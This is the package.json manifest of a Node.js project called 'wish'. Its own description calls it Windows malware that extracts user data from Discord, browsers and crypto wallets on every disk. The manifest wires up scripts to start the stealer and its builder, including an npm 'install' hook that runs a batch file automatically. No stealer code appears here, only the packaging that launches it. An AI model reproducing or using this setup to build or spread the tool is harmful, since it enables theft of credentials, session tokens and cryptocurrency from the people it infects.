{
    "name": "wish",
    "version": "1.0.0",
    "description": "Node.js malware for Windows that extracts user data from Discord, browsers, crypto wallets, and more, affecting all users on every disk.",
    "exports": null,
    "type": "module",
    "scripts": {
        "start": "cd src && node index.js",
        "install": "cd src && install.bat",
        "builder:start": "cd builder && node index.js",
        "builder:install": "cd builder && install.bat",
        "update": "npm i electron@latest -g",
        "format": "prettier . --write --cache --ignore-unknown",
        "format:check": "prettier . --check --cache --ignore-unknown",
        "lint": "eslint .",
        "lint:fix": "eslint . --fix"
    },
    "repository": {
        "type": "git",
        "url": "git+https://github.com/k4itrun/wish.git"
    },
    "keywords": [],
    "author": "k4itrun",
    "license": "MIT",
    "bugs": {
        "url": "https://github.com/k4itrun/wish/issues"
    },
    "homepage": "https://github.com/k4itrun/wish#readme",
    "devDependencies": {
        "@k4i/config": "^1.0.1",
        "eslint": "^9.24.0",
        "prettier": "^3.5.3"
    }
}
